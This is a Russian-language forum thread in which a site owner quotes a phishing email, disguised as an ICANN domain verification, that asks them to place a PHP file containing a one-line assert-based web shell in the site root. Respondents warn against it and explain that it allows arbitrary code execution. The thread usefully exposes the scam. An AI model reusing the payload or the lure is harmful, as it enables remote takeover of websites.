Каким образом могут навредить сайту?

Question

[Combat7]

Пришло письмо фишинг такого содержания
В соответствии с изменениями, внесенными в правила ICANN, Вы должны подтвердить, что фактическое управление доменным именем мойдомен осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1caya1tvwcu7ovs.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[REG]));

Что они получат если я напишу этот код в таком файле?

Comments

[Дмитрий]

Ни в коем случае не вставляйте этот код!

Answer 1

[Алексей Уколов]

Всё, что угодно - assert это аналог eval в данном случае, они могут выполнить совершенно любой код, создать любые файлы и т.п.
Именно поэтому в 7.2 эту функциональность выпилили.

Answer 2

[imhuman]

В принципе все, что угодно) В результате выполнится код присланный параметром 'reg'. А там все зависит от фантазии.

Answer 3

[D3lphi]

Все что захотят эти самые злоумышленники. Прочитайте эту статью и все сразу поймете.
Злоумышленник передаст в запрос параметр REG с нужной ему строкой (PHP кодом). А уж что он там напишет зависит только от его фантазии и намерений.